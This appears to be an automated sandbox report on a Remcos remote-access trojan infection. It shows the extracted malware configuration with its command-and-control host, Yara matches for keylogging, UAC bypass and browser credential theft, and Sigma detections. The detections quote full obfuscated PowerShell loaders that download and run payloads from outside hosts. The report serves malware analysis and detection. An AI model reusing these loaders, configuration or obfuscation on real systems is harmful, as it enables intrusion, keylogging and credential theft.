{"Host:Port:Password": ["newbeggin.duckdns.org:2412:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H42H13", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b6f8:$a1: Remcos restarted by watchdog!
            • 0x6bc70:$a3: %02i:%02i:%02i:%03i
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            35.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              35.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                35.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  35.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6b6f8:$a1: Remcos restarted by watchdog!
                  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                  35.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x65a04:$str_b2: Executing file:
                  • 0x6683c:$str_b3: GetDirectListeningPort
                  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x66380:$str_b7: \update.vbs
                  • 0x65a2c:$str_b9: Downloaded file:
                  • 0x65a18:$str_b10: Downloading file:
                  • 0x65abc:$str_b12: Failed to upload file:
                  • 0x66804:$str_b13: StartForward
                  • 0x66824:$str_b14: StopForward
                  • 0x662d8:$str_b15: fso.DeleteFile "
                  • 0x6626c:$str_b16: On Error Resume Next
                  • 0x66308:$str_b17: fso.DeleteFolder "
                  • 0x65aac:$str_b18: Uploaded file:
                  • 0x65a6c:$str_b19: Unable to delete:
                  • 0x662a0:$str_b20: while fso.FileExists("
                  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 7 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3356, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAg